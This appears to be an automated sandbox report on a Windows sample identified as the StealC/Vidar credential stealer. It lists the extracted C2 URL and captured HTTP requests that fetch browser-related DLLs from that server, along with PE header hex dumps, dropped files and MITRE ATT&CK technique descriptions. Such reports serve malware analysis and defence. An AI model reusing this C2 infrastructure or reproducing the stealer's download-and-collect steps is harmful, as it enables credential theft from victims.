00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:27:09 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:27:11 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.172.128.111/f993692117a3fda2.php"}
Source: 00000000.00000003.1631316383.0000000004410000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.111/f993692117a3fda2.php"}

Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.111

Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/sqlite3.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/freebl3.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/mozglue.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/msvcp140.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/nss3.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/softokn3.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8e6d9db21fb63946/vcruntime140.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report q27UFusYdn.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CBAKJEHDBGHIEBGCGDGH

C:\ProgramData\DTBZGIOOSO.docx

C:\ProgramData\EBFHJEGDAFHIJKECFBKJ

C:\ProgramData\FBFIDBFHDBGIDHJJEGHIIDAFID

C:\ProgramData\GIIIIJDH

C:\ProgramData\HJDGCGDBGCAAEBFIECGHDGCAAE

C:\ProgramData\JDDHMPCDUJ.xlsx

C:\ProgramData\JKKECBGIIIEBGCBGIDHDGCAKJE

C:\ProgramData\KATAXZVCPS.xlsx

C:\ProgramData\KECBFBAE

C:\ProgramData\LTKMYBSEYZ.docx

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_q27UFusYdn.exe_17f263357178d1bd3398f7e1a5c12181ad9221_49752fc2_41f5f8f8-a691-4b0e-a676-bc26f5cb5f80\Report.wer

Windows Analysis Report
q27UFusYdn.exe

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6CCF35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre